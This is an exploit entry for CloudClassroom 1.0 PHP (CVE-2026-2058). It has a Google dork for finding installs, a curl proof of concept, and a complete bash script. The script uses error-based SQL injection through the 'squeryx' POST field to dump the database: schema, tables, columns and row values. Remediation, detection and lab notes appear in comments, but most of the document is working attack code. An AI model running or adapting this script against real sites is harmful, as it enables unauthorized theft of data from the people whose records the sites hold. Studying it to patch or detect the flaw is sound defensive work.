# Exploit Title: CloudClassroom 1.0 - SQL Injection (Post Query)
# Google Dork: inurl:"postquerypublic" "Cloud Classroom"
# Date: 2026-03-11
# Exploit Author: Carlos Tuma
# Vendor Homepage: https://github.com/mathurvishal
# Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project
# Version: 1.0
# Tested on: Ubuntu 20.04 / Apache / MySQL
# CVE: CVE-2026-2058
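# Description:
# CloudClassroom PHP Project version 1.0 is vulnerable to an error-based SQL injection
# via the "squeryx" POST parameter in the /postquerypublic endpoint. "Error-based" means
# the injected expression forces a MySQL error and the application returns that error
# text, including the query result embedded in it, in the HTTP response.
# Remediation: bind "squeryx" through a prepared statement instead of building the query
# by string concatenation, and do not return database error messages to the client.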
# Vulnerable Endpoint:
# POST /postquerypublic
# Docker Lab (for testing):
# docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0
# Access:
# http://localhost:9292/postquerypublic
# PoC:
# curl -X POST http://TARGET/postquerypublic \
# -H "Content-Type: application/x-www-form-urlencoded" \
# --data-urlencode "gnamex=test" \
# --data-urlencode "[email protected]" \
# --data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
# --data-urlencode "update=Post Query!"
#!/bin/bash
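# Argument handling and banner.
# $1 is the full URL of the postquerypublic endpoint; the header comments give a
# local Docker lab instance at http://localhost:9292/postquerypublic.
TARGET="$1"
if [ -z "$TARGET" ]; then
  # A missing argument is a usage error: report it on stderr and exit non-zero,
  # so a wrapper script or lab harness does not record the run as a success.
  echo "Usage: $0 http://target/postquerypublic" >&2
  exit 2
fi
echo "======================================="
echo " CloudClassroom SQL Injection Exploit"
echo " CVE-2026-2058"
echo "======================================="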
# extract PAYLOAD
# Sends a single POST to "$TARGET" with PAYLOAD as the "squeryx" form field and
# prints the text found between the "~" markers of a MySQL
# "XPATH syntax error: '~...~'" message in the response body. Prints nothing
# (grep exits non-zero) when the response carries no such message.
# Globals:   TARGET (read); payload (written - it is not declared local)
# Arguments: $1 - the string placed in the squeryx field
# Outputs:   the matched text on stdout
#
# Detection: every call is a POST whose squeryx value contains "updatexml(" and
# "0x7e", and a vulnerable server answers with "XPATH syntax error" in the body.
# Both strings are usable as WAF/IDS signatures and in request-body logging.
# Mitigation: the server-side query is not shown on this page; for this bug class
# the fix is a prepared statement for squeryx plus suppressing database error
# output, which removes the channel this function reads from.
#
# NOTE(review): MySQL caps the length of the XPATH error text (commonly documented
# as 32 characters). A value long enough to lose its closing "~" yields no match
# here, so empty output from this script is not evidence that the endpoint is
# fixed - confirm remediation by reviewing the server-side query.
extract(){
# Plain assignment: overwrites any global variable named payload.
payload="$1"
# NOTE(review): the second --data-urlencode argument reads "[email protected]",
# which looks like the hosting page's e-mail obfuscation replacing the original
# form field; the original name and value cannot be recovered from this page.
# curl -s suppresses the progress meter; grep -oP prints only the span between
# the lookbehind ("XPATH syntax error: '~") and the next "~".
curl -s -X POST "$TARGET" \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=a" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=$payload" \
--data-urlencode "update=Post Query!" \
| grep -oP "(?<=XPATH syntax error: '~).*?(?=~)"
}
# Step 1: one request asking for database(), the current schema name. This is the
# same payload shown in the header PoC and is enough on its own to confirm, in the
# lab, whether the endpoint still reflects MySQL error text.
echo
echo "[+] Extracting database..."
DB=$(extract "a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1")
# DB is empty when extract matched nothing; the script prints it either way and
# continues without checking.
echo "[+] Database: $DB"
# Step 2: list table names of the current schema from information_schema.tables,
# one request per row. "LIMIT $i,1" selects the single row at offset i.
# The loop walks offsets 0 through 30 and stops at the first empty result, so at
# most 31 names are collected.
# Detection: this appears server-side as a run of near-identical POSTs that differ
# only in the LIMIT offset and all reference information_schema - a pattern that
# ordinary use of the form does not produce.
echo
echo "[+] Enumerating tables..."
tables=()
for i in {0..30}
do
TABLE=$(extract "a' AND updatexml(1,concat(0x7e,(SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT $i,1),0x7e),1) AND '1'='1")
# An empty result ends the enumeration; it cannot be told apart from a failed
# request or an unmatched response.
if [ -z "$TABLE" ]; then
break
fi
echo " -> $TABLE"
tables+=("$TABLE")
done
# Step 3: for every table collected above, list its columns and then read values
# cell by cell. Bounds visible in the loops: offsets 0..30 for columns (at most 31
# per table) and 0..20 for rows (at most 21 per column); each cell is one POST.
# Incident response: those bounds give an upper limit on how much a run of this
# exact script could have read per table, and the request count in WAF or
# request-body logs shows how far a run got before it stopped.
echo
echo "======================================="
echo " Dumping database"
echo "======================================="
for table in "${tables[@]}"
do
echo
echo "[+] Table: $table"
# Reset per table so columns from the previous table are not carried over.
columns=()
for i in {0..30}
do
# $table is text parsed out of an earlier server response and is placed back into
# the next payload unchanged.
COLUMN=$(extract "a' AND updatexml(1,concat(0x7e,(SELECT column_name FROM information_schema.columns WHERE table_name='$table' LIMIT $i,1),0x7e),1) AND '1'='1")
if [ -z "$COLUMN" ]; then
break
fi
echo " Column -> $COLUMN"
columns+=("$COLUMN")
done
echo
echo " Dumping data..."
for column in "${columns[@]}"
do
for row in {0..20}
do
# One request per (column, row) pair; both names come from earlier responses.
DATA=$(extract "a' AND updatexml(1,concat(0x7e,(SELECT $column FROM $table LIMIT $row,1),0x7e),1) AND '1'='1")
# The first empty value ends this column: an empty or NULL cell, or a value that
# extract could not match, hides every later row of the column.
if [ -z "$DATA" ]; then
break
fi
# Server-supplied text is written to the terminal as received, without filtering.
echo " [$column][$row] = $DATA"
done
done
done
echo
echo "[+] Dump finished"